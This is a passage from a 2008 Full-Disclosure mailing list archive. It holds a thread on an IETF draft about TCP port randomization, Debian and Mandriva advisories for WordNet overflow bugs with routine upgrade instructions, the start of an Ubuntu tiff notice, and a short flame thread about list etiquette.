hear comments on the rest of the document. Kind regards, -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 From victor.harutyunyan at arca.am Tue Sep 2 08:23:36 2008 From: victor.harutyunyan at arca.am (victor.harutyunyan at arca.am) Date: Tue, 02 Sep 2008 12:23:36 +0500 Subject: [Full-disclosure] test Message-ID: <48BCE9F8.5030204@arca.am> test From p.labushev at gmail.com Tue Sep 2 10:17:43 2008 From: p.labushev at gmail.com (Pavel Labushev) Date: Tue, 02 Sep 2008 17:17:43 +0800 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <43513.1220307806@turing-police.cc.vt.edu> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> <43513.1220307806@turing-police.cc.vt.edu> Message-ID: <48BD04B7.60702@gmail.com> Valdis.Kletnieks at vt.edu ?????: > On Mon, 01 Sep 2008 15:51:35 CDT, rholgstad said: >> Linus doesn't care about security > > No, he actually *does* care about security - he's just pf the opinion > that security fixes don't automatically rate a 'ZOMG! PWNED!' flag on > them like certain *BSD variants think. He thinks that sticking a big Linus is not a security expert. Not even close. He's not educated and not experienced enough to make security decisions, but he does. That's the problem. He cares somehow, but he's wrong. > SECURITY PATCH tag on a fix tends to make people cherry-pick and install > just those fixes - even though the patch they *didn't* install that > fixes a system crash or a silent data corruption is actually more critical. "SECURITY PATCH tag on a fix" helps me to know that there is the problem and I must consider the patch, check its correctness and maybe test/backport/apply it to my production systems ASAP. Just as another tags helps me to know that there are realiability and other issues I must care about. From thijs at debian.org Mon Sep 1 20:17:47 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Mon, 1 Sep 2008 21:17:47 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1634-1] New wordnet packages fix arbitrary code execution Message-ID: <20080901191747.6F115326F0B@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1634-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst September 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : wordnet Vulnerability : stack and heap overflows Problem type : local (remote) Debian-specific: no CVE id(s) : CVE-2008-2149 Debian Bug : 481186 Rob Holland discovered several programming errors in WordNet, an electronic lexical database of the English language. These flaws could allow arbitrary code execution when used with untrusted input, for example when WordNet is in use as a back end for a web application. For the stable distribution (etch), these problems have been fixed in version 1:2.1-4+etch1. For the testing distribution (lenny), these problems have been fixed in version 1:3.0-11+lenny1. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your wordnet package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1.dsc Size/MD5 checksum: 772 24980d288101a1c11e60e38fe5ea945a http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1.diff.gz Size/MD5 checksum: 22912 bb970bd2ccd457c6310ba0c75e5ed2be http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1.orig.tar.gz Size/MD5 checksum: 6379385 95a6e8144254a92a5ea0e97771ef9d07 Architecture independent packages: http://security.debian.org/pool/updates/main/w/wordnet/wordnet-sense-index_2.1-4+etch1_all.deb Size/MD5 checksum: 2242538 dc75e162b0013a5d7d0c0679115b134c http://security.debian.org/pool/updates/main/w/wordnet/wordnet-base_2.1-4+etch1_all.deb Size/MD5 checksum: 8701430 a680094a45ddf87dd0bcbb5fd63ceae2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_alpha.deb Size/MD5 checksum: 80734 3186aeb6b9365a333fdd608d5fa62ffe http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_alpha.deb Size/MD5 checksum: 109466 cc441b73b2ded97fff9fc5c668f2fbb0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_amd64.deb Size/MD5 checksum: 104990 b7b3225b10df973e2d8a652f770a6e1b http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_amd64.deb Size/MD5 checksum: 65118 bc75f17d4f5b1375fc3862ba80335d2f arm architecture (ARM) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_arm.deb Size/MD5 checksum: 61020 57e49d1f532015f07cbf3f71bba24237 http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_arm.deb Size/MD5 checksum: 100056 43a1c7d6c272412f4f1eff5ff284fd54 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_hppa.deb Size/MD5 checksum: 108312 f6ed8345d69a1e13e9cd87f7974566fd http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_hppa.deb Size/MD5 checksum: 69896 a1649115a5bba73602f4c6dba8a57964 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_i386.deb Size/MD5 checksum: 63096 ff93d37e8edeb63fd9268b19b052f3e2 http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_i386.deb Size/MD5 checksum: 101738 65a6a41a5bf4de85c6ce474de7155c73 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_ia64.deb Size/MD5 checksum: 83014 98d7592aac60e394cca7262dbae45dc5 http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_ia64.deb Size/MD5 checksum: 119716 a4a53c0fe7acf1828386d2e08e443b7a mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_mips.deb Size/MD5 checksum: 105498 f76685b8631f82c01b0fc604d22cb7b3 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_mips.deb Size/MD5 checksum: 73082 73a315a1e3706cc313559c7f8532232f mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_mipsel.deb Size/MD5 checksum: 104700 22d5b12949930d49d4d49ac63f106747 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_mipsel.deb Size/MD5 checksum: 71604 78f164f9758891934cb3854c8a10c6e7 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_powerpc.deb Size/MD5 checksum: 108852 0b0448af12ac1052b11833252a269765 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_powerpc.deb Size/MD5 checksum: 69846 44d14734b11f31fb1f3522d68fae68ad s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_s390.deb Size/MD5 checksum: 107032 a83524f4bc09a6f78a53216356043175 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_s390.deb Size/MD5 checksum: 65640 241a7fa7673077cfc762492a44c7764d sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_sparc.deb Size/MD5 checksum: 102918 1f7f85106a3f41cfc2162db49ce0ac1f http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_sparc.deb Size/MD5 checksum: 64812 89d27a34508044af76f2eeac4e1c696a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSLw/n2z0hbPcukPfAQJtQwgAsW+ORtd4lhMAsOaZ6mFQrHj3EJ7AnXRH 0hMoBxUM/ViyWJ/iKFgGKzbmAndl/ylRH3dWKkd4j/E08yQocvM5Ym3kSlV9ni1X sF6zNdD8eY9FLT6Ja7yT5RrKn7rriNhAr9MaktMq276eCaCpSoB85KfhJ+UGapPJ cMXLPW59z5BqgFi708stButXe0PHUmMcp/Zd+pvSTvsH+fLaxKK3DBRp2pH4DNLM Dceugrdzt10uZfeZGRClcDAX4u9HUPwHs7gW7EuaQH5Ni7Y+aZhsigJOGTOl4DOF 4nEgh5eth1WJ0iK1I01KOunfhXVxXWAxh6b27sZbHhpAvYoYl3aKNg== =EsVl -----END PGP SIGNATURE----- From coderman at gmail.com Tue Sep 2 15:15:20 2008 From: coderman at gmail.com (coderman) Date: Tue, 2 Sep 2008 07:15:20 -0700 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <48bd038b.1c1d640a.5688.3991@mx.google.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <48bd038b.1c1d640a.5688.3991@mx.google.com> Message-ID: <4ef5fec60809020715o5f952350l3f485237e209b8b1@mail.gmail.com> On Tue, Sep 2, 2008 at 2:06 AM, Fernando Gont wrote: > ... there's no description of what Windows does some things speak for themselves... :) > Also, the base Linux system already implements Algorithm #3... why > ... patch if you seed/key #3 poorly, as just one example. (which you reference via RFC4086, etc) > P.S.: The "survey" section must be about 1% of the document. I'd be glad to > hear comments on the rest of the document. sure... section #4 should be: s/should consider randomizing/must randomize/ From Valdis.Kletnieks at vt.edu Tue Sep 2 17:05:31 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 02 Sep 2008 12:05:31 -0400 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: Your message of "Tue, 02 Sep 2008 17:17:43 +0800." <48BD04B7.60702@gmail.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> <43513.1220307806@turing-police.cc.vt.edu> <48BD04B7.60702@gmail.com> Message-ID: <12267.1220371531@turing-police.cc.vt.edu> On Tue, 02 Sep 2008 17:17:43 +0800, Pavel Labushev said: > "SECURITY PATCH tag on a fix" helps me to know that there is the problem > and I must consider the patch, check its correctness and maybe > test/backport/apply it to my production systems ASAP. Just as another > tags helps me to know that there are realiability and other issues I > must care about. OK, now s/security patch/silent data corruption/ and tell me what's *actually* different. Wow, you still need to consider it, check it, test it, and deploy it. Unless of course you don't give a shit about your data. But in that case, the security patch can probably be overlooked too. That's Linus's point - if the patch is important enough to go into one of the -stable tree kernels, it's probably something you want to install, whether or not it's a security patch. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/96656963/attachment.bin From anonymouspimp at gmail.com Tue Sep 2 17:51:22 2008 From: anonymouspimp at gmail.com (anonymous pimp) Date: Tue, 2 Sep 2008 19:51:22 +0300 Subject: [Full-disclosure] die Message-ID: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> die On 9/2/08, victor.harutyunyan at arca.am wrote: > test > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From tdjacr.wiki at gmail.com Tue Sep 2 18:50:26 2008 From: tdjacr.wiki at gmail.com (Thedjatclubrock) Date: Tue, 02 Sep 2008 13:50:26 -0400 Subject: [Full-disclosure] die In-Reply-To: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> Message-ID: <48BD7CE2.9060003@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 anonymous pimp wrote: > die > > > On 9/2/08, victor.harutyunyan at arca.am wrote: >> test >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > Can we please avoid messages like this one in the future, thank you. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAki9fOIACgkQJoEx0rzyOBl5vACfWrtUOAOVlObh1BMx8C6GRNB8 r1wAoI6OYiwhaAWDgMKMjd36M5uyWVAd =smCy -----END PGP SIGNATURE----- From nytrokiss at gmail.com Tue Sep 2 18:50:58 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Sep 2008 10:50:58 -0700 Subject: [Full-disclosure] die In-Reply-To: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> Message-ID: <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> Double Die On Tue, Sep 2, 2008 at 9:51 AM, anonymous pimp wrote: > die > > > On 9/2/08, victor.harutyunyan at arca.am wrote: > > test > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/3848a10c/attachment.html From jdemott at crucialsecurity.com Tue Sep 2 18:57:05 2008 From: jdemott at crucialsecurity.com (Jared DeMott) Date: Tue, 02 Sep 2008 13:57:05 -0400 Subject: [Full-disclosure] die In-Reply-To: <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> Message-ID: <48BD7E71.30306@crucialsecurity.com> James Matthews wrote: > Double Die Gang, telling people to die is not nice. Please refer to [1] or [2]. [1] http://www.elliottsamazing.com/kindergarden.html [2] http://en.wikipedia.org/wiki/Ethic_of_reciprocity From xploitable at gmail.com Tue Sep 2 19:07:35 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 2 Sep 2008 19:07:35 +0100 Subject: [Full-disclosure] security news on cnet??? Message-ID: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> you've not post any security news all week, what's going on cnet??? is the journalist that does the security news off ill??? :( yours, cnet fan -- https://groups.google.com/group/n3td3v From Valdis.Kletnieks at vt.edu Tue Sep 2 19:13:26 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 02 Sep 2008 14:13:26 -0400 Subject: [Full-disclosure] die In-Reply-To: Your message of "Tue, 02 Sep 2008 13:57:05 EDT." <48BD7E71.30306@crucialsecurity.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> <48BD7E71.30306@crucialsecurity.com> Message-ID: <21110.1220379206@turing-police.cc.vt.edu> On Tue, 02 Sep 2008 13:57:05 EDT, Jared DeMott said: > James Matthews wrote: > > Double Die > Gang, telling people to die is not nice. Please refer to [1] or [2]. Ever notice that most of the 'die in a fire' comments come from top-posters? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/784d0ce6/attachment.bin From p.labushev at gmail.com Tue Sep 2 19:18:13 2008 From: p.labushev at gmail.com (Pavel Labushev) Date: Wed, 03 Sep 2008 02:18:13 +0800 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <12267.1220371531@turing-police.cc.vt.edu> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> <43513.1220307806@turing-police.cc.vt.edu> <48BD04B7.60702@gmail.com> <12267.1220371531@turing-police.cc.vt.edu> Message-ID: <48BD8365.2060308@gmail.com> Valdis.Kletnieks at vt.edu ?????: > On Tue, 02 Sep 2008 17:17:43 +0800, Pavel Labushev said: > >> "SECURITY PATCH tag on a fix" helps me to know that there is the problem >> and I must consider the patch, check its correctness and maybe >> test/backport/apply it to my production systems ASAP. Just as another >> tags helps me to know that there are realiability and other issues I >> must care about. > > OK, now s/security patch/silent data corruption/ and tell me what's *actually* > different. The consequences are actually and obviously different. Now, please, try to figure out that by yourself. Forget about Linus' point. Pretend you're system administrator and try to think like one. > Wow, you still need to consider it, check it, test it, and deploy it. Not exactly. > Unless of course you don't give a shit about your data. But in that case, > the security patch can probably be overlooked too. Hint: the data can be backed up. > That's Linus's point - if the patch is important enough to go into one of > the -stable tree kernels, it's probably something you want to install, whether > or not it's a security patch. Whether or not so-called -stable kernels are always stable - is another question. And not a last one - there are more. From nytrokiss at gmail.com Tue Sep 2 19:17:12 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Sep 2008 11:17:12 -0700 Subject: [Full-disclosure] security news on cnet??? In-Reply-To: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> References: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> Message-ID: <8a6b8e350809021117u7046d373uf711a04edd1d0d0f@mail.gmail.com> I also enjoy Cnet security news. On Tue, Sep 2, 2008 at 11:07 AM, n3td3v wrote: > > you've not post any security news all week, what's going on cnet??? is > the journalist that does the security news off ill??? > > :( > > yours, > > cnet fan > > -- > https://groups.google.com/group/n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- http://search.goldwatches.com/search.aspx?Search=Movado+Watches -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/85ece3ca/attachment.html From fernando.gont at gmail.com Tue Sep 2 19:30:48 2008 From: fernando.gont at gmail.com (Fernando Gont) Date: Tue, 02 Sep 2008 15:30:48 -0300 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <4ef5fec60809020715o5f952350l3f485237e209b8b1@mail.gmail.co m> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <48bd038b.1c1d640a.5688.3991@mx.google.com> <4ef5fec60809020715o5f952350l3f485237e209b8b1@mail.gmail.com> Message-ID: <48bd875d.02c3f10a.364a.7c3b@mx.google.com> At 11:15 a.m. 02/09/2008, coderman wrote: >On Tue, Sep 2, 2008 at 2:06 AM, Fernando Gont wrote: > > ... there's no description of what Windows does > >some things speak for themselves... :) What speaks for itself? Our work is a proposal for a few alternatives for doing port randomization. Two of them are new, and are supposed to avoid some of the problems that are usually caused by a trivial port randomization algorithm (e.g., algorithm #1 and algorithm #2). Full stop. We simply provide a small survey in case you ask yourself "what is being done out there" by popular TCP implementations. The survey is simply an appendix, and was added as I was examining the Linux and *BSD code myself. > > Also, the base Linux system already implements Algorithm #3... why > > ... patch > >if you seed/key #3 poorly, as just one example. (which you reference >via RFC4086, etc) If algorithm #3 is seeded poorly, then I think you should document it, and send a patch so that that problem is fixed in the base system. > > P.S.: The "survey" section must be about 1% of the document. I'd be glad to > > hear comments on the rest of the document. > >sure... section #4 should be: >s/should consider randomizing/must randomize/ If anything, it should be "should randomize". "MUSTs" are meant to mandate specific behaviors/rules that, if not followed, would lead to interoperability problems. -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 From randy at procyonlabs.com Tue Sep 2 19:35:23 2008 From: randy at procyonlabs.com (Randal T. Rioux) Date: Tue, 2 Sep 2008 14:35:23 -0400 (EDT) Subject: [Full-disclosure] security news on cnet??? In-Reply-To: <8a6b8e350809021117u7046d373uf711a04edd1d0d0f@mail.gmail.com> References: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> <8a6b8e350809021117u7046d373uf711a04edd1d0d0f@mail.gmail.com> Message-ID: <60c228f48c77372e2e505ab1b29d5fe1.squirrel@meteor.procyonlabs.com> On Tue, Sep 2, 2008 at 11:07 AM, n3td3v wrote: > > you've not post any security news all week, what's going on cnet??? is > the journalist that does the security news off ill??? > > :( > > yours, > > cnet fan surely they will cave to pressure from the global powers of the netdev group. i bet they'll be a story up for comment pretty soon now. randy From security at mandriva.com Tue Sep 2 20:08:01 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Sep 2008 13:08:01 -0600 Subject: [Full-disclosure] [ MDVSA-2008:182 ] wordnet Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:182 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wordnet Date : September 2, 2008 Affected: 2008.0, 2008.1 _______________________________________________________________________ Problem Description: Rob Holland found several programming errors in WordNet which could lead to the execution or arbitrary code when used with untrusted input (CVE-2008-2149). The updated packages have been patched to prevent these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2149 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 1c6a1df61fe91dda3ae4dac057401fbc 2008.0/i586/libwordnet3.0-3.0-6.1mdv2008.0.i586.rpm 1802486553d178a0802fd0ad89b6cef6 2008.0/i586/libwordnet3.0-devel-3.0-6.1mdv2008.0.i586.rpm 751310829f7f292fa358fe30111dff14 2008.0/i586/wordnet-3.0-6.1mdv2008.0.i586.rpm 719473d84e3be3fdf46333f6faa74a41 2008.0/SRPMS/wordnet-3.0-6.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5ff81320990de26154b15e56b30b51e1 2008.0/x86_64/lib64wordnet3.0-3.0-6.1mdv2008.0.x86_64.rpm 99d9ad1f9abaefbf9f6acb8b31f52027 2008.0/x86_64/lib64wordnet3.0-devel-3.0-6.1mdv2008.0.x86_64.rpm b91a656c9dc2d6ec69d51ba335c78b3d 2008.0/x86_64/wordnet-3.0-6.1mdv2008.0.x86_64.rpm 719473d84e3be3fdf46333f6faa74a41 2008.0/SRPMS/wordnet-3.0-6.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 70639dc3c0f6905ee668f17dc9e6d0fb 2008.1/i586/libwordnet3.0-3.0-6.1mdv2008.1.i586.rpm abb67cb73d41e34361933e1f684b7b31 2008.1/i586/libwordnet3.0-devel-3.0-6.1mdv2008.1.i586.rpm 365af128c071777483b61ed89b760802 2008.1/i586/wordnet-3.0-6.1mdv2008.1.i586.rpm d5371cdefa639f61fc303c3804218c95 2008.1/SRPMS/wordnet-3.0-6.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 14bbe9699fe4d0b6b6aa6660a22799a7 2008.1/x86_64/lib64wordnet3.0-3.0-6.1mdv2008.1.x86_64.rpm 45c1a11f43f3b53517b63f9a74e15a1b 2008.1/x86_64/lib64wordnet3.0-devel-3.0-6.1mdv2008.1.x86_64.rpm 615b4e49a4be1edac0fc5320a46f1e9d 2008.1/x86_64/wordnet-3.0-6.1mdv2008.1.x86_64.rpm d5371cdefa639f61fc303c3804218c95 2008.1/SRPMS/wordnet-3.0-6.1mdv2008.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIvWLZmqjQ0CJFipgRAhdfAJ4/nXJx0C4bu8vaDBN/26S3fXdNngCeI7Gw 6d9rt5zYII6WCveNT/Sa2Y4= =pXug -----END PGP SIGNATURE----- From dr at kyx.net Tue Sep 2 20:10:36 2008 From: dr at kyx.net (Dragos Ruiu) Date: Tue, 2 Sep 2008 12:10:36 -0700 Subject: [Full-disclosure] die In-Reply-To: <21110.1220379206@turing-police.cc.vt.edu> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> <48BD7E71.30306@crucialsecurity.com> <21110.1220379206@turing-police.cc.vt.edu> Message-ID: <02FEEEFC-BA0D-4AD8-9C90-96F8A0FC875C@kyx.net> Please support the Internet campaign to de-vilify top posting. On 2-Sep-08, at 11:13 AM, Valdis.Kletnieks at vt.edu wrote: > On Tue, 02 Sep 2008 13:57:05 EDT, Jared DeMott said: >> James Matthews wrote: >>> Double Die >> Gang, telling people to die is not nice. Please refer to [1] or [2]. > > Ever notice that most of the 'die in a fire' comments come from top- > posters? > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Seriously... with modern multi-paned mail readers, top-posting is a better way to communicate. cheers, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques Buenos Aires, Argentina Sept. 30 / Oct. 1 - 2008 http://ba-con.com.ar Tokyo, Japan November 12/13 2008 http://pacsec.jp Vancouver, Canada March 16-20 2009 http://cansecwest.com pgpkey http://dragos.com/ kyxpgp From william at lefkovics.net Tue Sep 2 20:17:13 2008 From: william at lefkovics.net (william at lefkovics.net) Date: Tue, 2 Sep 2008 13:17:13 -0600 Subject: [Full-disclosure] die Message-ID: <2d89d200$514dffa$4edaddf0$@com> It's often way too time consuming to navigate to bottom-posted commentary to form a reasonable sample size for assessment, so I'll have to take your word for it. ---------------------------------------- From: Valdis.Kletnieks at vt.edu Sent: Tuesday, September 02, 2008 11:14 AM To: "Jared DeMott" Subject: Re: [Full-disclosure] die On Tue, 02 Sep 2008 13:57:05 EDT, Jared DeMott said: > James Matthews wrote: > > Double Die > Gang, telling people to die is not nice. Please refer to [1] or [2]. Ever notice that most of the 'die in a fire' comments come from top-posters? _______________________________________________ Full-Disclosure - We believe in it. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080902/74d4826d/attachment.html From xploitable at gmail.com Tue Sep 2 21:41:05 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 2 Sep 2008 21:41:05 +0100 Subject: [Full-disclosure] die In-Reply-To: <48BD7CE2.9060003@gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <48BD7CE2.9060003@gmail.com> Message-ID: <4b6ee9310809021341v25349c53t4f4603faea01fd5b@mail.gmail.com> On Tue, Sep 2, 2008 at 6:50 PM, Thedjatclubrock wrote: > Can we please avoid messages like this one in the future, thank you. Who do you think you are, Gadi Evron or something? Don't tell people what to do. -- https://groups.google.com/group/n3td3v From razishaban at gmail.com Tue Sep 2 21:59:03 2008 From: razishaban at gmail.com (Razi Shaban) Date: Tue, 2 Sep 2008 23:59:03 +0300 Subject: [Full-disclosure] die In-Reply-To: <4b6ee9310809021341v25349c53t4f4603faea01fd5b@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <48BD7CE2.9060003@gmail.com> <4b6ee9310809021341v25349c53t4f4603faea01fd5b@mail.gmail.com> Message-ID: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> On 9/2/08, n3td3v wrote: > On Tue, Sep 2, 2008 at 6:50 PM, Thedjatclubrock wrote: > > Can we please avoid messages like this one in the future, thank you. > > > Who do you think you are, Gadi Evron or something? Don't tell people what to do. > Who do you think you are, Gadi Evron or something? Don't tell people what to do. From kees at ubuntu.com Tue Sep 2 21:25:06 2008 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Sep 2008 13:25:06 -0700 Subject: [Full-disclosure] [USN-639-1] tiff vulnerability Message-ID: <20080902202506.GO12974@outflux.net> =========================================================== Ubuntu Security Notice USN-639-1 September 02, 2008 tiff vulnerability CVE-2008-2327 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libtiff4 